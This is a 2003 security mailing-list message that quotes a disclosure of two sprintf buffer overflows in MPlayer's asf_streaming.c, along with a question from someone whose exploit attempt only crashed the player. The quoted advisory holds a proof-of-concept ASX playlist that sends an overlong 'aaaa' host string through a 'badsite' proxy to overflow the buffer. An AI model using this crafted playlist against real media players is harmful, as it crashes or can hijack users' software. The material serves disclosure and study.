MPlayer buffer overflow

[Peter Geissler <blasty () geekz nl>]

In-Reply-To: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8 () USPLM250 txpln us eds com>
> I tried to exploit this bug, But I didn't succeed.
> The only thing happens is mplayer crashes, so I did a hookup with GDB, and saw it crashed on strcasecmp with eip 
> 0x40315fe0 and not something like 0x41414141 ;)
> In the PoC exploit on bugtraq the "aaaa..." buffer is not correctly formatted (newlines must be removed so it's one 
> long string..), but I already fixed that.
> Has anyone an idea what I'm doing wrong?

> > >Received: (qmail 27128 invoked from network); 26 Sep 2003 19:54:43 -0000
> > >Received: from outgoing3.securityfocus.com (205.206.231.27)
> > >  by mail.securityfocus.com with SMTP; 26 Sep 2003 19:54:43 -0000
> > >Received: from lists.securityfocus.com (lists.securityfocus.com [205.206.231.19])
> > >    by outgoing3.securityfocus.com (Postfix) with QMQP
> > >    id 29059A3563; Fri, 26 Sep 2003 11:15:06 -0600 (MDT)
> > >Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
> > >Precedence: bulk
> > >List-Id: <bugtraq.list-id.securityfocus.com>
> > >List-Post: <mailto:bugtraq () securityfocus com>
> > >List-Help: <mailto:bugtraq-help () securityfocus com>
> > >List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
> > >List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
> > >Delivered-To: mailing list bugtraq () securityfocus com
> > >Delivered-To: moderator for bugtraq () securityfocus com
> > >Received: (qmail 1413 invoked from network); 25 Sep 2003 18:13:00 -0000
> > >Message-ID: <2CEBCAF96F65D411858800508BDFDC6CD0D8B8 () USPLM250 txpln us eds com>
> > >From: "Otero, Hernan" <hernan.otero () eds com>
> > >To: "'bugtraq () securityfocus com'" <bugtraq () securityfocus com>
> > >Subject: Mplayer Buffer Overflow
> > >Date: Thu, 25 Sep 2003 19:17:49 -0500
> > >MIME-Version: 1.0
> > >X-Mailer: Internet Mail Service (5.5.2656.59)
> > >Content-Type: text/plain;
> > >    charset="ISO-8859-1"
> > >Content-Transfer-Encoding: quoted-printable
> > >
> > >
> > >Favorite Linux Player Buffer Overflow
> > >
> > >
> > > Product:  Mplayer
> > > Developers:  http://www.mplayerhq.hu
> > > OS:    Port to All *NIX and Win32
> > > Remote Exploitable:  YES
> > >
> > >Developers has been contacted, problem was fixed, recomended update 
> > >your
> > >mplayer version.
> > >
> > > In the source tree there is a file called asf_streaming.c this file 
> > >has a
> > >function named asf_http_request, that function has two buffer 
> > >overflows,
> > >this overflows are in the sprintf lines.
> > >
> > >
> > > asf_http_request {
> > >            char str[250];
> > >            ....
> > >            ...
> > >            ..
> > >            sprintf( str, "Host: %s:%d", server_url->hostname,
> > > server_url->port );    
> > > 		....
> > >            ...
> > >            ..
> > >            sprintf( str, "Host: %s:%d", url->hostname, url->port );
> > >
> > >            ....
> > >            ...
> > >            ..
> > > }
> > >
> > >
> > >
> > > This, at a first look, may look as it can=B4t be exploited ( because 
> > >the
> > >MAXHOSTLEN size restriction )... but if in an ASX file like this with a
> > >"badsite" listening in "badport" send "\n\n" as answer you could lead 
> > >to a
> > >fully controllable EIP buffer overflow
> > >
> > >
> > > <asx version =3D "3.0">
> > > <title>Bas Site ASX</title>
> > >
> > > <moreinfo href =3D "mailto:info () badsite com
> > > <mailto:info () badsite com> " />
> > > <logo href =3D "http://www.badsite.com/streaming/grupo.gif
> > > <http://www.badsite.com/streaming/grupo.gif> " style=3D"ICON" />
> > > <banner href=3D "images/bannermitre.gif">
> > > <abstract>Bad Site live</abstract>
> > > <moreinfo target=3D"_blank" href =3D "http://www.badsite.com/
> > > <http://www.badsite.com/> " />
> > > </banner>
> > >
> > > <entry>
> > > <title>NEWS</title>
> > > <AUTHOR>NEWS</AUTHOR>
> > > <COPYRIGHT>=A9 All by the news</COPYRIGHT>
> > > <ref href 
> > >"http_proxy://badsite:badport/http://aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
> > >aaaa
> > >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
> > >aaaa
> > >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
> > >aaaa
> > >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
> > >aaaa
> > >aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=
> > >aaaa
> > >aaaaaaaaaaaa"/>
> > > <logo href =3D "http://www.badsite.com/streaming/grupo.gif
> > > <http://badsite.com/streaming/grupo.gif> " style=3D"ICON" />
> > > </entry>
> > > </asx>
> > >
> > >
> > >
> > > Regards,
> > >
> > >   Hern=E1n Otero
> > >   hernan.otero () eds com